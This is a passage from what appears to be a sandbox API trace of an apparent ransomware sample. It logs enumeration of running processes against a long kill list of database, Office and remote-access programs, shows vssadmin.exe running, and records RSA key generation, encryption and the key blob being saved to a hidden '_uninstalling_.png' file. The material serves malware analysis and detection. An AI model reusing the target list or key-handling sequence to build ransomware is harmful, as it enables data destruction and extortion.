SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, 
Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.879] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.880] lstrcmpiW (lpString1="taskhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.880] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0112.881] lstrcmpiW (lpString1="dllhost.exe", 
lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.881] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0112.882] lstrcmpiW (lpString1="dllhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, 
infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.882] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIAPSRVR.EXE.exe")) returned 1 [0112.883] lstrcmpiW (lpString1="WMIAPSRVR.EXE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, 
Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.883] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0112.884] lstrcmpiW (lpString1="vssadmin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.884] 
Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.885] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.885] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.886] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, 
synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.886] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0112.887] lstrcmpiW (lpString1="VSSVC.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, 
visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.887] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.888] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, 
schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.888] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.889] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.889] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.890] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.890] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.891] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, 
encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.891] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0112.892] CloseHandle (hObject=0x210) returned 1 [0112.892] CryptAcquireContextA (in: phProv=0x39f0a0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x39f0a0*=0x7c6248) returned 1 [0113.566] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\_uninstalling_.png", lpDst=0x39f8b8, nSize=0x104 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png") returned 0x41 [0113.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0113.566] CryptGenKey (in: hProv=0x7c6248, Algid=0xa400, dwFlags=0x4000001, phKey=0x39f09c | out: phKey=0x39f09c*=0x7c65a0) returned 1 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x50) returned 0x7c9438 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x440) returned 0x7cc090 [0114.343] CryptExportKey (in: hKey=0x7c65a0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x7cc090, pdwDataLen=0x39f0a0 | out: pbData=0x7cc090*, pdwDataLen=0x39f0a0*=0x94) returned 1 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xd4) returned 0x7c6378 [0114.343] CryptExportKey (in: hKey=0x7c65a0, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x7cc090, pdwDataLen=0x39f0a0 | out: pbData=0x7cc090*, pdwDataLen=0x39f0a0*=0x254) returned 1 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x294) returned 0x79f840 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7cc090 | out: hHeap=0x780000) returned 1 [0114.344] CryptDestroyKey (hKey=0x7c65a0) returned 1 [0114.344] CryptImportKey (in: hProv=0x7c6248, pbData=0x7c6378, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0xdf44b8 | out: phKey=0xdf44b8*=0x7c65a0) returned 1 [0114.344] lstrlenA (lpString="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") returned 712 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x309) returned 0x79fae0 [0114.344] CryptImportKey (in: hProv=0x7c6248, pbData=0x79fae0, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0x39f0a0 | out: phKey=0x39f0a0*=0x7c6660) returned 1 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79fae0 | out: 
hHeap=0x780000) returned 1 [0114.345] CryptEncrypt (in: hKey=0x7c6660, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x1f5, dwBufLen=0x200 | out: pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x200) returned 1 [0114.346] CryptEncrypt (in: hKey=0x7c6660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x5f, dwBufLen=0x200 | out: pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x200) returned 1 [0114.347] GetProcessHeap () returned 0x780000 [0114.347] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x599) returned 0x7d1740 [0114.347] CryptDestroyKey (hKey=0x7c6660) returned 1 [0114.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x6, hTemplateFile=0x0) returned 0x178 [0114.349] lstrlenA (lpString="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") returned 1368 [0114.349] WriteFile (in: hFile=0x178, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x559, lpNumberOfBytesWritten=0x39fccc, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x39fccc*=0x559, lpOverlapped=0x0) returned 1 [0114.350] WriteFile (in: hFile=0x178, lpBuffer=0x7c6378*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x39fccc, lpOverlapped=0x0 | out: lpBuffer=0x7c6378*, lpNumberOfBytesWritten=0x39fccc*=0x94, lpOverlapped=0x0) returned 1 [0114.351] CloseHandle (hObject=0x178) returned 1 [0114.355] GetProcessHeap () returned 0x780000 [0114.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c6378 | out: hHeap=0x780000) returned 1 [0114.355] GetProcessHeap () returned 0x780000 [0114.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79f840 | out: hHeap=0x780000) returned 1 [0114.356] GetProcessHeap () returned 0x780000 [0114.356] HeapFree 